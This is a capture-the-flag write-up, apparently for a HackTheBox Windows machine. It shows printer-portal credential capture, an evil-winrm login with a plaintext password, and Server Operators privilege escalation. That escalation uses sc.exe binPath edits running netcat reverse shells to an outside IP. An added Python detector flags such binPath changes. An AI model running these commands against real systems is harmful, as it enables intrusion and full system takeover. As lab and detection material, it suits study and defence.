Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.11.108
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
We have a lot of ports here, but we only need LDAP (TCP 389) and HTTP (TCP 80). Navigating to http://10.10.11.108 gives us a Printer Admin Portal. Going to Settings, we see a method of getting credentials back by changing the server address to our TUN0 IP address.
In a moment, we get back LDAP credentials:
We should be able to connect to the printer with evil-winrm:
evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'
Now, we can run 'net user' to find what groups the svc-printer user is in. One of them is Server Operators, which has elevated permissions to stop and start services. All we need to do is modify a service's binary path and we can get a reverse shell as SYSTEM. This is going to be an easy one!
sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.4 1234"
sc.exe stop vss
sc.exe start vss
Once the first connection comes in, immediately run:
C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.4 1339
If we don't, the shell will drop.
Each "The service did not respond" message is a dropped connection, so definitely run the second netcat connection if you want a stable shell.
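From the defender's side, the binPath change above shows up in process-creation logging as an sc.exe command line. The following is an added detection sketch, not part of the original writeup: the event shape, field names and the two heuristics are assumptions, and the sample events are constructed.

```python
import re

# "sc[.exe] config <service> ... binPath= <value>"; value may be quoted or bare.
SC_BINPATH = re.compile(
    r'(?i)\bsc(?:\.exe)?\s+config\s+(?P<svc>\S+)\s+.*?\bbinpath=\s*(?P<path>"[^"]*"|\S+)'
)
USER_WRITABLE = re.compile(r'(?i)\\(users|temp|programdata)\\')
SHELL_ARG = re.compile(r'(?i)\b(cmd|powershell|pwsh)(\.exe)?\b')


def review(command_line):
    """Return (service, new_path, reasons) for a binPath change, else None."""
    m = SC_BINPATH.search(command_line)
    if not m:
        return None
    path = m.group("path").strip('"')
    reasons = []
    if USER_WRITABLE.search(path):
        reasons.append("binary in user-writable directory")
    if SHELL_ARG.search(path):
        reasons.append("command interpreter in service command line")
    return m.group("svc"), path, reasons


def scan(events):
    """Return alerts for events whose binPath change has at least one reason."""
    alerts = []
    for ev in events:
        hit = review(ev["command_line"])
        if hit and hit[2]:
            alerts.append({"user": ev["user"], "service": hit[0],
                           "bin_path": hit[1], "reasons": hit[2]})
    return alerts


# Constructed sample events (hypothetical shape, loosely process-creation logs).
SAMPLE_EVENTS = [
    {"user": "svc-printer", "command_line":
     r'sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.4 1234"'},
    {"user": "svc-printer", "command_line": "sc.exe stop vss"},
    {"user": "admin", "command_line": "sc.exe config vss start= demand"},
    {"user": "admin", "command_line":
     r'sc.exe config spooler binPath= "C:\Windows\System32\spoolsv.exe"'},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Only the first sample event raises an alert; the spooler change is recognised as a binPath edit but matches neither heuristic.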
Grab both flags and this box is done!